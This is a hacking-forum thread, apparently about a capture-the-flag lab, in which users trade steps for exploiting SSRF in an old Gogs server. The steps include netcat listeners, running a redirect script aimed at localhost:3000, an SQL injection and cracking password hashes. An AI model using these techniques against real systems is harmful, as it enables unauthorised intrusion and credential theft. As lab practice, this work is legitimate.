Return to forum

ererersdsre · August 20, 2022 at 10:14 PM

No, it's just SSRF

echo133t · August 20, 2022 at 10:57 PM

I got this:

2014 GoGits \u00b7 Version: 0.5.5.1010 Beta

I want to try : https://www.exploit-db.com/exploits/35238

but can't redirect all that request :s

JINXX · August 20, 2022 at 11:14 PM

(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?

redirect health check to localhost:3000 then payload has html

I'm redirecting to localhost how do i get to the payload

unamedstaff04 · August 20, 2022 at 11:16 PM

(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?

redirect health check to localhost:3000 then payload has html

Can you explain a little better how to do it?

echo133t · August 20, 2022 at 11:26 PM

(August 20, 2022, 11:16 PM)unamedstaff04 Wrote:
(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?

redirect health check to localhost:3000 then payload has html

Can you explain a little better how to do it?

I'm using this method:
Payload URL: http://10.10.xx.xx:4444

nc -lvnp 4444

Monitored URL: http://10.10.xx.xx

To bypass filter: use https://gist.github.com/shreddd/b7991ab491384e3c3331

python2 redirect.py --port 80 --ip 10.10.xx.xx http://127.0.0.1:3000

Under what circumstances...
Always

and get the response json on netcat listener

ererersdsre · August 21, 2022 at 12:13 AM

(August 20, 2022, 11:29 PM)d3ext Wrote:
(August 20, 2022, 11:16 PM)unamedstaff04 Wrote:
(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?

redirect health check to localhost:3000 then payload has html

Can you explain a little better how to do it?

download https://gist.githubusercontent.com/shreddd/b7991ab491384e3c3331/raw/57a633529ce4f495aae25d6270b379f1d3ea6fd5/redirect.py
execute: sudo python2 redirect.py --ip <LHOST> --port 80 http://127.0.0.1:3000
in other window execute: nc -nlvp 9001

Now in the web you have to enter "http://<LHOST>/" as Monitored URL and enter "http://<LHOST>:9001/" as Payload URL so it will check the port 9001 of your machine, which is open so it sends a request to http://<LHOST>/ and it redirects to the Gogs page and returns the content of the 3000 port to your netcat listener in port 9001

With nc -klnvp 9001 > response.json got the gogs html, but how can i see the gogs page in the browser? because it's useless like that

ashleykitty · August 21, 2022 at 1:16 AM

I've got a SQL injection in the Gogs server through SSRF, but I'm struggling figuring out how to leverage it; the password hashes are pbkdf2-sha256 and we seem to be in a container that prevents remote code execution.

bodiesplus · August 21, 2022 at 1:22 AM

what SQL payload did you use, if you don't mind me asking?

wayxoo · August 21, 2022 at 1:36 AM

(August 21, 2022, 01:16 AM)ashleykitty Wrote: I've got a SQL injection in the Gogs server through SSRF, but I'm struggling figuring out how to leverage it; the password hashes are pbkdf2-sha256 and we seem to be in a container that prevents remote code execution.

what SQL payloads you have used and where you have passed them? if you mind

ashleykitty · August 21, 2022 at 1:43 AM

Nevermind. I got user; gotta crack that hash once you figure out how to format it.